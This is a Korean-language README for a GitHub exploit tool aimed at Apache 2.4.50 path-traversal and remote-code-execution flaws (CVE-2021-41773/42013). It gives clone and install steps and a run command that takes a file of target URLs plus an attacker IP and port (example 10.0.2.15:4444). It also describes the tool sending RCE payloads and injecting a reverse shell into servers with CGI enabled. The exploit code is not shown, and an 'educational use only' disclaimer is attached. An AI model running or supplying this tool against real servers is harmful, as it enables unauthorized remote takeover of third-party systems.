
Apache-HTTP-Server-2.4.50-RCE 이 도구는 Apache 서버에서 CVE-2021-41773 / CVE-2021-42013 취약점을 테스트하기 위해 설계되었습니다. 교육 목적으로만 사용되며, 명시적 허가를 받은 시스템에서 책임감 있게 사용해야 합니다.
이 도구는 CVE-2021-41773 / CVE-2021-42013 취약점에 대해 Apache 서버를 테스트하기 위해 설계되었습니다. 교육 목적으로만 사용되며, 테스트할 명시적 권한이 있는 시스템에서만 책임감 있게 사용해야 합니다.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
텍스트 파일에는 대상의 URL이 포함되어야 합니다.
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Apache 버전 확인: 제공된 파일의 각 URL에 대해 서버가 Apache 버전 2.4.50을 실행 중인지 확인합니다.
서버가 취약한 경우: 디렉토리 트래버설 공격을 트리거하거나 원격으로 코드를 실행하기 위해 페이로드를 전송하여 서버를 익스플로잇하려고 시도합니다. CGI가 활성화된 경우: 원격 액세스를 위해 리버스 셸 페이로드를 주입하려고 시도합니다.
교육 목적으로만 사용: 이 스크립트는 취약점을 테스트하고 익스플로잇하는 방법을 시연하기 위한 교육 목적으로 제작되었습니다. 승인되지 않은 대상에 대해 이 스크립트를 사용하는 것은 불법이며 비윤리적입니다.
수정 목적: 추가 오류 처리 추가, 페이로드 로직 및 RCE 최적화, cve 제거